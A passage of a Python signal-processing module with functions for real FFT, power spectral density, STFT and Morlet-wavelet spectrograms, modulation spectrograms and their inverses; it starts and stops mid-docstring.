IRFFT (Default: first array dimension whose size does not equal 1)\n\n Returns\n -------\n x : Real-valued signal(s) \n \n See Also\n --------\n `np.fft.ifft()`\n '''\n \n # verify y\n shape_y = y.shape\n # number of dimentions\n dim_y = len(shape_y)\n \n # limits to 2-dimention data\n assert dim_y<=2\n \n # check shape of y, and set n and dim defaults\n if dim_y == 1:\n dim_def = 0\n else:\n if shape_y[0] == 1:\n # shape [1, n_samples] (row vector)\n dim_def = 1\n elif shape_y[1] == 1:\n # shape [n_samples, 1] (column vector)\n dim_def = 0 \n else:\n # X is a 2D Matrix, a shape [n_samples, n_channels] is asummed\n dim_def = 0\n \n if dim is None:\n dim = dim_def\n \n # verify 'n' number-of-samples parameter\n if n is None:\n print('N not provided. Y is assumed be obtained from a signal X with even number fo samples')\n n_half = shape_y[dim]\n n = (n_half - 1) * 2\n \n # reconstruct missing half of Spectrum\n if np.mod(n,2) == 0:\n # number of samples is even\n n_half = (n / 2) + 1\n ix_limit = slice(1, -1 )\n else:\n # number of samples is odd\n n_half = (n + 1) / 2\n ix_limit = slice(1, None)\n\n if dim_y == 1:\n # spectrum in y is 1D\n y_neg = np.conj(np.flipud(y[ix_limit]))\n yc = np.concatenate((y, y_neg), axis=0)\n else:\n # check shape of y, and add negative frequencies\n if dim == 0:\n # spectra in y are column wise\n y_neg = np.conj(np.flipud(y[ix_limit, :]))\n yc = np.concatenate((y, y_neg), axis=0)\n else:\n # spectra in y are row-wise\n y_neg = np.conj(np.fliplr(y[:, ix_limit]))\n yc = np.concatenate((y, y_neg), axis=1)\n \n x = np.real(np.fft.ifft(yc, n, dim))\n \n return x\n\n\ndef rfft_psd(x, fs, n_fft=None, win_function = 'hamming', channel_names=None):\n \"\"\" This function computes the PSD for one or a set of REAL signals.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n n_fft : Number of samples to compute the FFT\n (Default = n_samples in array x) \n win_function : Window function applied to the signal \n (Default 'Hamming')\n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... n_channels) \n\n\n Returns\n -------\n psd_data : Dictionary with PSD data, with the elements:\n rFFT\n First half of the FFT(x) (u), scaled by the Window RMS \n PSD\n Power Spectrum Density (u^2 / Hz) \n fs\n Sampling frequency (Hz)\n freq_axis\n Frequency axis for rFFT and PSD (Hz)\n freq_delta\n Frequency axis step (Hz)\n n_samples\n Number of samples of the signal or signals 'x'\n n_fft\n Number of elements utilized to perform FFT\n win_function\n Window applied to the data in 'x'\n channel_names \n Names of channels\n \n \"\"\"\n\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # validate 'n_fft' argument\n if n_fft is None:\n n_fft = n_samples\n\n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n # windowing data\n win = scipy.signal.get_window(win_function, n_samples, fftbins=False)\n win.shape = (n_samples, 1)\n win_rms = np.sqrt(np.sum(np.square(win)) / n_samples)\n win_mat = np.tile(win, n_channels)\n x = np.multiply(x, win_mat)\n\n # real FFT with zero padding if n_fft ~= n_samples\n Xt = rfft(x, n_fft)\n # spectrum scaled by window RMS\n Xt = Xt / win_rms\n # power spectrum\n X_pwr = abs(np.multiply(Xt, np.conj(Xt)))\n X_pwr = X_pwr * (1/np.square(n_fft))\n\n # adjust for even and odd number of elements\n if n_fft % 2 != 0:\n # odd case\n n_freqs = (n_fft + 1) / 2\n # double all frequency components except DC component \n X_pwr[1:, :] = X_pwr[1:, :] * 2\n \n else:\n # even case \n n_freqs = (n_fft / 2) + 1\n # double all frequency components except DC and fs/2 components\n X_pwr[1:-1, :] = X_pwr[1:-1, :] * 2\n \n # frequency axis step\n f_delta = (fs / n_fft)\n # scale PSD with the frequency step\n psd = np.divide(X_pwr, f_delta)\n\n # frequency axis for spectrum\n n_freqs = int(n_freqs)\n f_axis = np.asarray(range(0, n_freqs)) * f_delta\n \n # output 'psd_data' dictionary\n psd_data = {}\n psd_data['rFFT'] = Xt\n psd_data['PSD'] = psd\n psd_data['fs'] = fs\n psd_data['freq_axis'] = f_axis\n psd_data['freq_delta'] = f_delta\n psd_data['n_samples'] = n_samples\n psd_data['n_fft'] = n_fft\n psd_data['win_function'] = win_function\n psd_data['channel_names'] = channel_names\n \n return psd_data\n\ndef irfft_psd(psd_data):\n \"\"\"Compute the inverse PSD for one or a set of REAL signals.\n \n Parameters\n ----------\n psd_data : Structure with PSD data, created with rfft_psd()\n \n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n\n \"\"\"\n # Load data from PSD structure\n rFFT_data = psd_data['rFFT']\n f_ax = psd_data['freq_axis']\n fs = psd_data['fs']\n win_function = psd_data['win_function']\n n_samples = psd_data['n_samples']\n n_channels = rFFT_data.shape[1]\n \n # Find the number of elements used for the rFFT\n if f_ax[-1] < fs/2:\n # elements for FFT was odd\n n_fft = (len(f_ax) * 2) - 1\n elif f_ax[-1] - fs/2 < 1000 * np.finfo(np.float64).eps:\n # elements for FFT was even\n n_fft = (len(f_ax) - 1) * 2\n \n # Window RMS\n win = scipy.signal.get_window(win_function, n_samples, fftbins=False)\n win.shape = (n_samples, 1)\n win_rms = np.sqrt(np.sum(np.square(win)) / n_samples)\n \n # IRFFT\n X = rFFT_data * win_rms\n x_tmp = irfft(X, n_fft)\n \n # Keep only n_samples points\n x = x_tmp[0 : n_samples + 1, :]\n \n # Un-Windowing\n win_mat = np.tile(win, n_channels)\n x = np.divide(x, win_mat)\n \n return x\n\ndef strfft_spectrogram(x, fs, win_size, win_shift, n_fft=None, win_function='hamming', channel_names=None):\n \"\"\"Compute the Short Time real FFT Spectrogram for one or a set of REAL signals 'x'.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n win_size :\n Size of the sliding window for STFFF (samples)\n win_shift :\n Shift between consecutive windows (samples) \n n_fft : Number of samples to compute the FFT\n (Default = n_samples in array x) \n win_function : Window function applied to the signal \n (Default 'Hamming')\n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... n_channels) \n\n Returns\n -------\n spectrogram_data : Dictionary with Spectrogram data, with the elements:\n rFFT_spectrogram\n rFFT values for each window (u), scaled by the Window RMS \n power_spectrogram :\n PSD values for each window (u^2 / Hz) \n fs : \n Sampling frequency (Hz)\n freq_axis :\n Frequency axis for rFFT and PSD (Hz)\n freq_delta :\n Frequency axis step (Hz)\n time_axis :\n Time axis for rFFT_spectrogram and power_spectrogram (s) \n time_delta :\n Time axis step (s)\n win_size_samples :\n Size of the sliding window for STFFF (samples)\n win_shift_samples :\n Shift between consecutive windows (samples) \n n_fft :\n Number of elements utilized to perform FFT \n win_function :\n Window applied to the data in 'x' \n n_windows :\n Number of ST windows\n n_samples :\n Number of samples of the signal or signals 'x'\n channel_names \n Names of channels\n \n \"\"\"\n \n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # validate 'n_fft' argument \n if n_fft is None:\n n_fft = win_size\n\n # round win_size and win_shift\n win_size = round(win_size)\n win_shift = round(win_shift)\n\n # time axis step for Spectrogram\n t_delta = win_shift / fs\n\n # Create time vector 'time_vct' for signal 'x'\n time_vct = np.array(range(0, np.size(x, 0))) / fs\n\n \n # epoch signal or signals 'x'\n x_epoched, _ , ix = epoching(x, win_size, win_size - win_shift)\n\n # time axis for Spectrogram\n t_ax = time_vct[ix]\n\n # spectrogram parameters\n n_samples_win, n_channels, n_windows = x_epoched.shape\n\n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n # compute PSD per window\n for i_window in range(0, n_windows):\n # ith epoch of the signal or signals\n x_epoch = (x_epoched[:, :, i_window])\n psd_struct = rfft_psd(x_epoch, fs, n_fft, win_function, channel_names)\n \n # initialize arrays for spectrogram data\n if i_window == 0:\n # frequency Axis for spectrogram\n f_ax = psd_struct['freq_axis']\n # delta Frequency\n f_delta = psd_struct['freq_delta']\n # initialize 'rFFT_spectrogram' and 'pwr_spectrogram'\n rFFT_spectrogram = np.zeros((n_windows, len(f_ax), n_channels), dtype = complex)\n pwr_spectrogram = np.zeros((n_windows, len(f_ax), n_channels))\n \n # rFFT data\n rFFT_spectrogram[i_window, :, :] = psd_struct['rFFT']\n # power data\n pwr_spectrogram[i_window, :, :] = psd_struct['PSD']\n\n # scale 'pwr_spectrogram' by number of windows and time delta\n pwr_spectrogram = pwr_spectrogram / (n_windows * t_delta)\n\n\n # output 'spectrogram_data' dictionary\n spectrogram_data = {}\n spectrogram_data['rFFT_spectrogram'] = rFFT_spectrogram\n spectrogram_data['power_spectrogram'] = pwr_spectrogram\n spectrogram_data['fs'] = fs\n spectrogram_data['freq_axis'] = f_ax\n spectrogram_data['freq_delta'] = f_delta\n spectrogram_data['time_axis'] = t_ax\n spectrogram_data['time_delta'] = t_delta\n spectrogram_data['win_size_samples'] = win_size\n spectrogram_data['win_shift_samples'] = win_shift\n spectrogram_data['n_fft'] = n_fft\n spectrogram_data['win_function'] = win_function\n spectrogram_data['n_windows'] = n_windows\n spectrogram_data['n_samples'] = n_samples \n spectrogram_data['channel_names'] = channel_names\n\n return spectrogram_data\n\ndef istrfft_spectrogram(spectrogram_data):\n \"\"\"Compute the inverse STFT spectrogram for one or a set of REAL signals.\n \n Parameters\n ----------\n spectrogram_data : Structure with STFT spectrogram data, created with strfft_spectrogram()\n\n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n x_epoched = Segments form the signal or set of signals utilized to\n create the spectrogram in spectrogram_struct\n\n \"\"\"\n # Load data from Spectrogram structure\n rFFT_data = spectrogram_data['rFFT_spectrogram']\n win_size = spectrogram_data['win_size_samples']\n win_shift = spectrogram_data['win_shift_samples']\n \n # Generate psd_struct, to use irfft_psd()\n psd_struct = {}\n psd_struct['fs'] = spectrogram_data['fs']\n psd_struct['channel_names'] = spectrogram_data['channel_names']\n psd_struct['freq_axis'] = spectrogram_data['freq_axis']\n psd_struct['win_function'] = spectrogram_data['win_function']\n psd_struct['n_samples'] = win_size\n \n # Initialize rFFT_slice and x_epoched variables\n (n_windows, n_freqs, n_channels) = rFFT_data.shape\n rfft_slide = np.zeros((n_freqs, n_channels))\n x_epoched = np.zeros((win_size, n_channels, n_windows))\n \n for i_window in range(n_windows):\n # rFFT slice from spectrogram\n rfft_slide = rFFT_data[i_window, :, :]\n # Generate psd_struct, to use irfft_psd()\n psd_struct['rFFT'] = rfft_slide \n # ifft_psd from the rFFT data recovers the signal or set of signals 'x'\n x_tmp = irfft_psd(psd_struct)\n x_epoched[:, :, i_window] = x_tmp\n\n # Merge epoched data\n x = iepoching(x_epoched, win_shift);\n \n return x, x_epoched\n\ndef wavelet_spectrogram(x, fs, n_cycles=6, freq_vct=None, channel_names=None):\n \"\"\"Compute the Spectrogram using the Complex Morlet wavelet for one or a set of REAL signals 'x'. \n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n n : Number of cicles inside the Gaussian curve \n (Default 6)\n freq_vct : 1D array \n with frequencies to compute the CWT (Default = [1 : 1 : fs/2] )\n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... n_channels) \n\n Returns\n -------\n spectrogram_data : Dictionary with Spectrogram data, with the elements:\n wavelet_coefficients\n Coefficients of the Wavelet transformation (u) \n power_spectrogram :\n Power spectrogram (u^2 / Hz) \n fs : \n Sampling frequency (Hz)\n freq_axis :\n Frequency axis for rFFT and PSD (Hz)\n freq_delta :\n Frequency axis step (Hz)\n time_axis :\n Time axis for rFFT_spectrogram and power_spectrogram (s) \n time_delta :\n Time axis step (s)\n n_cycles : \n Number of cicles used inside the Gaussian curve \n wavelet_kernels :\n Wavelet kernels used to obtain the wavelet coefficients\n n_samples :\n Number of samples of the signal or signals 'x'\n channel_names \n Names of channels\n \n \"\"\"\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # validate 'freq_vct' argument\n if freq_vct is None:\n freq_vct = np.array(range(1, int(np.floor(fs / 2) + 1)))\n \n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n # Time delta\n t_delta = 1 / fs\n \n # Frequency delta\n f_delta = freq_vct[1] - freq_vct[0]\n\n # Create time vector 'time_vct' for signal 'x'\n time_vct = np.array(range(0, np.size(x, 0))) / fs\n\n # Number of samples\n n_samples = np.size(x, 0)\n\n # Wavelet transform\n wavelet_coefficients, wavelet_family = cmorlet_wavelet(x, fs, freq_vct, n_cycles)\n\n # Power from Wavelet coefficients\n power_spectrogram = np.square(np.abs(wavelet_coefficients))\n power_spectrogram = power_spectrogram * 2 / (fs * n_samples)\n\n # output 'spectrogram_data' dictionary\n spectrogram_data = {}\n spectrogram_data['wavelet_coefficients'] = wavelet_coefficients\n spectrogram_data['power_spectrogram'] = power_spectrogram\n spectrogram_data['fs'] = fs\n spectrogram_data['freq_axis'] = freq_vct\n spectrogram_data['freq_delta'] = f_delta\n spectrogram_data['time_axis'] = time_vct\n spectrogram_data['time_delta'] = t_delta\n spectrogram_data['n_cycles'] = n_cycles\n spectrogram_data['wavelet_kernels'] = wavelet_family \n spectrogram_data['n_samples'] = n_samples\n spectrogram_data['channel_names'] = channel_names\n\n return spectrogram_data\n\ndef iwavelet_spectrogram(spectrogram_data):\n \"\"\" Compute the inverse CWT Spectrogram for one or a set of REAL signals.\n \n Parameters\n ----------\n spectrogram_data : Structure with CWT Spectrogram data, created with wavelet_spectrogram()\n\n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n x_epoched = Segments form the signal or set of signals utilized to\n create the spectrogram in spectrogram_struct\n\n \"\"\"\n \n # compute the scaling factor for each wavelet kernel\n s = spectrogram_data['n_cycles'] / ( 2 * np.pi * spectrogram_data['freq_axis'])\n A = 1. / ((s**2) * np.pi) ** (1./4)\n\n\n x_tmp = np.real(spectrogram_data['wavelet_coefficients'])\n\n # compute the mean across scaled \"filtered\" signals\n for ix, a in enumerate(A):\n x_tmp[:, ix, :] = x_tmp[:, ix, :] / a \n \n x = np.mean(x_tmp, axis = 1) \n \n #x = squeeze(mean( bsxfun(@rdivide, real(spectrogram_data.wavelet_coefficients) , A ), 2));\n\n return x\n\ndef strfft_modulation_spectrogram(x, fs, win_size, win_shift, fft_factor_y=None, win_function_y='hamming', fft_factor_x=None, win_function_x='hamming', channel_names=None):\n \"\"\"Compute the Modulation Spectrogram using the Complex Morlet wavelet for one or a set of REAL signals 'x'.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n win_size :\n Size of the sliding window for STFFF (samples)\n win_shift :\n Shift between consecutive windows (samples) \n fft_factor_y : Number of elements to perform the 1st FFT is given as:\n n_fft_y = fft_factor_y * n_samples, (default, fft_factor_y = 1)\n win_function_y : Window to apply in the 1st FFT \n (Default 'Hamming')\n fft_factor_x : Number of elements to perform the 2nd FFT is given as:\n n_fft_x = fft_factor_x * n_samples, (default, fft_factor_x = 1)\n win_function_x : Window to apply in the 2nd rFFT \n (Default 'Hamming') \n n_fft : Number of samples to compute the FFT\n (Default = n_samples in array x) \n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... n_channels) \n\n Returns\n -------\n modulation_spectrogram_data : Dictionary with Modulation Spectrogram data, with the elements:\n rFFT_modulation_spectrogram\n rFFT values for each window (u), scaled by the Window RMS \n power_modulation_spectrogram :\n Power modulation spectrogram (u^2 / Hz) \n fs : \n Sampling frequency (Hz)\n fs_mod : \n Sampling frequency of modulation-frequency (Hz) \n freq_axis :\n Frequency axis for rFFT and PSD (Hz)\n freq_delta :\n Frequency axis step (Hz)\n freq_mod_axis :\n Modulation-frequency axis for rFFT_modspec and pwr_modspec (Hz) \n freq_mod_delta :\n Modulation-frequency step (Hz)\n win_size_samples :\n Size of the sliding window for STFFF (samples)\n win_shift_samples :\n Shift between consecutive windows (samples) \n n_fft_y :\n Number of elements utilized to perform the 1st FFT\n n_fft_x :\n Number of elements utilized to perform the 2nd FFT\n win_function_y :\n Window to apply in the 1st rFFT \n win_function_x :\n Window to apply in the 2nd rFFT \n n_windows :\n Number of ST windows\n n_samples :\n Number of samples of the signal or signals 'x'\n spectrogram_data : \n Dictionary with Spectrogram data\n channel_names :\n Names of channels\n \n \"\"\"\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # validate 'fft_factor_y' argument \n if fft_factor_y is None:\n fft_factor_y = 1\n \n # validate 'fft_factor_x' argument \n if fft_factor_x is None:\n fft_factor_x = 1\n \n # number of elements for the 1st FFT\n n_fft_y = fft_factor_y * win_size\n\n \n # compute STFFT spectrogram\n spectrogram_data = strfft_spectrogram(x, fs, win_size, win_shift, n_fft_y, win_function_y, channel_names)\n n_windows, n_freqs, n_channels = spectrogram_data['rFFT_spectrogram'].shape\n # Number of elements for the 2nd FFT\n n_fft_x = fft_factor_x * n_windows\n\n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n # modulation sampling frequency\n fs_mod = 1 / (win_shift / fs)\n\n # the AM analysis is made in the Amplitude derived from the Power Spectrogram\n for i_channel in range(0, n_channels):\n # data to generate the Modulation Spectrogram\n spectrogram_1ch = np.sqrt(spectrogram_data['power_spectrogram'][:,:,i_channel]) \n\n # compute 'rfft_psd' on each frequency timeseries\n mod_psd_struct = rfft_psd(spectrogram_1ch, fs_mod, n_fft_x, win_function_x, channel_names )\n \n if i_channel == 0:\n # modulation frequency axis\n fmod_ax = mod_psd_struct['freq_axis']\n # modulation frequency delta\n fmod_delta = mod_psd_struct['freq_delta']\n \n # initialize 'rFFT_modspec' and 'pwr_modspec'\n n_freqsmod = len(fmod_ax)\n rFFT_modspec = np.zeros((n_freqs, n_freqsmod ,n_channels), dtype = complex)\n pwr_modspec = np.zeros((n_freqs, n_freqsmod ,n_channels))\n\n # rFFT data\n rFFT_modspec[:, :, i_channel] = mod_psd_struct['rFFT'].transpose()\n # power data\n pwr_modspec[:, :, i_channel] = mod_psd_struct['PSD'].transpose()\n\n # scale 'pwr_modspec' by modulation-frequency delta\n pwr_modspec = pwr_modspec / fmod_delta\n\n # output 'modulation_spectrogram_data' structure\n modulation_spectrogram_data = {}\n modulation_spectrogram_data['rFFT_modulation_spectrogram'] = rFFT_modspec\n modulation_spectrogram_data['power_modulation_spectrogram'] = pwr_modspec\n modulation_spectrogram_data['fs'] = fs\n modulation_spectrogram_data['fs_mod'] = fs_mod\n modulation_spectrogram_data['freq_axis'] = spectrogram_data['freq_axis']\n modulation_spectrogram_data['freq_delta'] = spectrogram_data['freq_delta']\n modulation_spectrogram_data['freq_mod_axis'] = fmod_ax\n modulation_spectrogram_data['freq_mod_delta'] = fmod_delta\n modulation_spectrogram_data['win_size_samples'] = win_size\n modulation_spectrogram_data['win_shift_samples'] = win_shift\n modulation_spectrogram_data['n_fft_y'] = n_fft_y\n modulation_spectrogram_data['n_fft_x'] = n_fft_x\n modulation_spectrogram_data['win_function_y'] = win_function_y\n modulation_spectrogram_data['win_function_x'] = win_function_x\n modulation_spectrogram_data['n_windows'] = n_windows \n modulation_spectrogram_data['n_samples'] = spectrogram_data['n_samples'] \n modulation_spectrogram_data['spectrogram_data'] = spectrogram_data\n modulation_spectrogram_data['channel_names'] = channel_names\n \n return modulation_spectrogram_data\n\ndef istrfft_modulation_spectrogram(modulation_spectrogram_data):\n \"\"\" Compute the inverse STFT-based modulation spectrogram for one or a set of REAL signals.\n \n Parameters\n ----------\n modulation_spectrogram_data : Structure with STFT-based modulation spectrogram data, \n created with strfft_modulation_spectrogram()\n \n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n \n \"\"\"\n # Number of channels from Modspectrogram structure\n n_channels = modulation_spectrogram_data['rFFT_modulation_spectrogram'].shape[2]\n \n # Prepare psd_tmp_data to perform irFFT on Modulation Spectogram\n psd_tmp_data = {}\n psd_tmp_data['freq_axis'] = modulation_spectrogram_data['freq_mod_axis']\n psd_tmp_data['fs'] = modulation_spectrogram_data['fs_mod']\n psd_tmp_data['win_function'] = modulation_spectrogram_data['win_function_x']\n psd_tmp_data['n_samples'] = modulation_spectrogram_data['n_windows']\n\n\n for i_channel in range(n_channels):\n # Slide with the rFFT coeffients of the 2nd FFT \n psd_tmp_data['rFFT'] = np.transpose(modulation_spectrogram_data['rFFT_modulation_spectrogram'][:,:,i_channel]) \n # Recovers the Square Root of the Power Spectrogram\n sqrt_pwr_spectrogram = irfft_psd(psd_tmp_data)\n # Power Spectrogram\n pwr_spectrogram = sqrt_pwr_spectrogram ** 2\n # Scale Power Spectrogram by (n_windows * time_delta)\n pwr_spectrogram = pwr_spectrogram * modulation_spectrogram_data['spectrogram_data']['n_windows'] * modulation_spectrogram_data['spectrogram_data']['time_delta']\n # Scale Power Spectrogram by (freq_delta)\n pwr_spectrogram = pwr_spectrogram * modulation_spectrogram_data['spectrogram_data']['freq_delta']\n # Scale Power Spectrogram by the number of samples used\n pwr_spectrogram = pwr_spectrogram / (1 / modulation_spectrogram_data['spectrogram_data']['n_fft'] ** 2)\n # Divde by 2 all the elements except DC and the Nyquist point (in even case) \n pwr_spectrogram = pwr_spectrogram / 2\n pwr_spectrogram[:, 0] = pwr_spectrogram[:, 0] * 2\n if np.mod(modulation_spectrogram_data['spectrogram_data']['n_fft'], 2) == 0:\n # NFFT was even, then \n pwr_spectrogram[:, -1] = pwr_spectrogram[:, -1] * 2\n spectrogram_abs = np.sqrt(pwr_spectrogram)\n # Recovers the Angle values of the Spectrogram\n spectrogram_angle = np.angle(modulation_spectrogram_data['spectrogram_data']['rFFT_spectrogram'][:,:,i_channel])\n # Creates the rFFT coefficients of the 1st FFTs\n modulation_spectrogram_data['spectrogram_data']['rFFT_spectrogram'][:,:,i_channel] = spectrogram_abs * np.exp(1j * spectrogram_angle ) \n\n # Recovers the origial signal or set of signals\n x = istrfft_spectrogram(modulation_spectrogram_data['spectrogram_data'])[0]\n \n return x\n\ndef wavelet_modulation_spectrogram(x, fs, n_cycles=6, freq_vct=None, fft_factor_x=1, win_function_x='hamming', channel_names=None):\n \"\"\"Compute the Modulation Spectrogram using the Wavelet for one or a set of REAL signals 'x'.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n n : Number of cicles inside the Gaussian curve \n (Default 6)\n freq_vct : 1D array \n with frequencies to compute the CWT (Default = [1 : 1 : fs/2] )\n fft_factor_x : Number of elements to perform the FFT is given as:\n n_fft_x = fft_factor_x * n_samples, (default, fft_factor_x = 1)\n win_function_x : Window to apply in the rFFT \n (Default 'Hamming') \n channel_names : Names of the signals\n (Default Signal-XX with XX 1, 2, ... n_channels) \n\n Returns\n -------\n modulation_spectrogram_data : Dictionary with Modulation Spectrogram data, with the elements:\n rFFT_modulation_spectrogram\n rFFT values for each window (u), scaled by the Window RMS \n power_modulation_spectrogram :\n Power modulation spectrogram (u^2 / Hz) \n fs : \n Sampling frequency (Hz)\n fs_mod : \n Sampling frequency of modulation-frequency (Hz) \n freq_axis :\n Frequency axis for rFFT and PSD (Hz)\n freq_delta :\n Frequency axis step (Hz)\n freq_mod_axis :\n Modulation-frequency axis for rFFT_modspec and pwr_modspec (Hz) \n freq_mod_delta :\n Modulation-frequency step (Hz)\n n_fft_x :\n Number of elements utilized to perform the FFT\n win_function_x :\n Window to apply in the 2nd rFFT \n n_samples :\n Number of samples of the signal or signals 'x'\n spectrogram_data : \n Dictionary with Spectrogram data\n channel_names :\n Names of channels\n \n \"\"\"\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape \n \n # generate default channel names, if needed\n if channel_names is None:\n channel_names = []\n for ic in range (0 , n_channels):\n icp = ic + 1\n channel_names.append( str('Signal-%02d' % icp) )\n \n spectrogram_data = wavelet_spectrogram(x, fs, n_cycles, freq_vct, channel_names)\n n_windows, n_freqs, n_channels = spectrogram_data['wavelet_coefficients'].shape\n\n # number of elements for FFT of the spectrogram\n n_fft_x = fft_factor_x * n_windows \n\n fs_mod = fs\n\n # the AM analysis is made in the Amplitude derived from the Power Spectrogram\n for i_channel in range(0, n_channels):\n # data to generate the Modulation Spectrogram\n spectrogram_1ch = np.sqrt(spectrogram_data['power_spectrogram'][:, :, i_channel])\n # Compute rfft_psd on each frequency timeseries\n psd_dict = rfft_psd(spectrogram_1ch, fs, n_fft_x)\n \n rfft_result = psd_dict['rFFT']\n rfft_psd_res = psd_dict['PSD']\n \n if i_channel == 0:\n # modulation frequency axis\n fmod_ax = psd_dict['freq_axis']\n # modulation frequency delta\n fmod_delta = psd_dict['freq_delta']\n n_freqsmod = np.size(fmod_ax)\n # initialize 'rFFT_modspec' and 'pwr_modspec'\n rfft_modspec = np.zeros((n_freqs, n_freqsmod, n_channels), dtype = complex)\n pwr_modspec = np.zeros((n_freqs, n_freqsmod, n_channels))\n \n # rFFT data\n rfft_modspec[:, :, i_channel] = np.transpose(rfft_result) \n # power data\n pwr_modspec[:, :, i_channel] = np.transpose(rfft_psd_res)\n \n # scale 'pwr_modspec' by modulation-frequency delta \n pwr_modspec = pwr_modspec / fmod_delta\n\n # output 'modulation_spectrogram_data' dictionary\n modulation_spectrogram_data = {}\n modulation_spectrogram_data['rFFT_modulation_spectrogram'] = rfft_modspec\n modulation_spectrogram_data['power_modulation_spectrogram'] = pwr_modspec\n modulation_spectrogram_data['fs'] = fs\n modulation_spectrogram_data['fs_mod'] = fs_mod\n modulation_spectrogram_data['freq_axis'] = spectrogram_data['freq_axis']\n modulation_spectrogram_data['freq_delta'] = spectrogram_data['freq_delta']\n modulation_spectrogram_data['freq_mod_axis'] = fmod_ax\n modulation_spectrogram_data['freq_mod_delta'] = fmod_delta\n modulation_spectrogram_data['n_fft_x'] = n_fft_x\n modulation_spectrogram_data['win_function_x'] = win_function_x\n modulation_spectrogram_data['n_samples'] = spectrogram_data['n_samples'] \n modulation_spectrogram_data['spectrogram_data'] = spectrogram_data\n modulation_spectrogram_data['channel_names'] = channel_names\n \n return modulation_spectrogram_data\n\ndef iwavelet_modulation_spectrogram(modulation_spectrogram_data):\n \"\"\" Compute the inverse CWT-based modulation spectrogram for one or a set of REAL signals.\n \n Parameters\n ----------\n modulation_spectrogram_data : Structure with CWT-based modulation spectrogram data, \n created with wavelet_modulation_spectrogram()\n\n Returns\n -------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n\n \"\"\"\n # Number of channels from Modspectrogram structure\n n_channels = modulation_spectrogram_data['rFFT_modulation_spectrogram'].shape[2]\n \n # Prepare psd_tmp_data to perform irFFT on Modulation Spectogram\n psd_tmp_data = {}\n psd_tmp_data['freq_axis'] = modulation_spectrogram_data['freq_mod_axis']\n psd_tmp_data['fs'] = modulation_spectrogram_data['fs_mod']\n psd_tmp_data['win_function'] = modulation_spectrogram_data['win_function_x']\n psd_tmp_data['n_samples'] = modulation_spectrogram_data['n_samples']\n \n \n for i_channel in range(n_channels):\n # Slide with the rFFT coeffients of the 2nd FFT \n psd_tmp_data['rFFT'] = np.transpose(modulation_spectrogram_data['rFFT_modulation_spectrogram'][:,:,i_channel]) \n # Recovers the Square Root of the Power Spectrogram\n sqrt_pwr_spectrogram = irfft_psd(psd_tmp_data)\n \n # Recovers the Magnitude of the Wavelet Coefficents\n pwr_spectrogram = sqrt_pwr_spectrogram ** 2\n pwr_spectrogram = pwr_spectrogram * modulation_spectrogram_data['fs_mod'] * modulation_spectrogram_data['n_samples']\n pwr_spectrogram = pwr_spectrogram / 2\n spectrogram_abs = np.sqrt(pwr_spectrogram)\n \n # Recovers the Angle values of the Spectrogram\n spectrogram_angle = np.angle(modulation_spectrogram_data['spectrogram_data']['wavelet_coefficients'][:,:,i_channel])\n \n # Creates the rFFT coefficients of the 1st FFTs\n modulation_spectrogram_data['spectrogram_data']['wavelet_coefficients'][:,:,i_channel] = spectrogram_abs * np.exp(1j * spectrogram_angle ) \n \n # Recovers the origial signal or set of signals\n x = iwavelet_spectrogram(modulation_spectrogram_data['spectrogram_data'])\n\n return x\n\ndef plot_spectrogram_data(spectrogram_data, ix=None, t_range=None, f_range=None, c_range=None, c_map='viridis'):\n \"\"\" Plot the Power Spectrogram related to the `spectrogram_data`\n \n Parameters\n ----------\n spectrogram_data : \n Dictionary with Spectrogram data\n ix : Index of the signal (channel) to plot\n (Default, all the channels, a new figure for each)\n t_range : Time range\n (Default [minimum time, maximum time])\n f_range : Frequency range\n (Default [minimum frequency, maximum frequency])\n c_range : Color (power) range\n (Default [mean power, maximum power])\n c_map : Colot Map\n (Default viridis)\n \n Returns\n -------\n If only a plot is requested, it is plotted in the existen axes 